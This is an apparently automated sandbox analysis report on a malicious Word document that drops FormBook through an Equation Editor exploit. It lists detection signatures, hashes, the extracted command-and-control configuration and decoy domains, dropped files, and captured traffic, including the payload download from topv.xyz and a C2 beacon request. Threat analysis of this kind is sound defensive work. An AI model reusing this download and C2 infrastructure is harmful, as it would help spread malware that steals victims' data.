Windows Analysis Report QUOTATION1100630004R2.doc

Overview

General Information

Sample Name: QUOTATION1100630004R2.doc
Analysis ID: 452514
MD5: a3336f2a85c572aab40243c347ebfe59
SHA1: f6b300530f6d294ea005b13ec08d881c9651f8af
SHA256: 9604fbb0d387877ea857295c8b350e75d5adedc3907bc25f19baf16fff3b0d05
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://topv.xyz/princedanx.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}
Multi AV Scanner detection for domain / URL
Source: topv.xyz Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\princedan85671.exe ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: QUOTATION1100630004R2.doc Virustotal: Detection: 33%
Source: QUOTATION1100630004R2.doc ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.princedan85671.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop esi 6_2_004172CB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop ebx 6_2_00407AFA
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 4x nop then pop edi 6_2_00417D5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 8_2_000972CB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00087AFB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 8_2_00097D5B
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: topv.xyz
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.containerflippers.com/np0c/
Performs DNS queries to domains with low reputation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE DNS query: topv.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 12:21:11 GMTContent-Type: application/x-msdownloadContent-Length: 648912Last-Modified: Wed, 21 Jul 2021 23:31:35 GMTConnection: keep-aliveETag: "60f8ae57-9e6d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1Host: www.anandsharmah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.239.243.112
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{23BE6748-299E-4B99-A605-44EE5B79BCDD}.tmp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: topv.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 583Date: Thu, 22 Jul 2021 12:22:48 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 30 63 2f 3f 54 52 2d 6c 3d 4d 62 47 50 2f 69 6b 67 57 46 77 31 59 58 38 73 6f 76 30 46 58 63 4c 6b 4a 39 39 48 2b 32 32 68 30 31 58 56 6a 4e 55 47 64 69 47 48 74 7a 76 66 7a 63 66 75 7a 49 52 50 77 4a 41 39 43 47 45 4e 61 2f 74 58 74 67 3d 3d 26 61 6d 70 3b 43 46 51 4c 6e 3d 45 50 74 34 34 46 72 38 66 5a 47 64 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 61 6e 61 6e 64 73 68 61 72 6d 61 68 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC 
"-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&amp;CFQLn=EPt44Fr8fZGdt was not found on this server.<HR><I>www.anandsharmah.com</I></BODY></HTML>
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
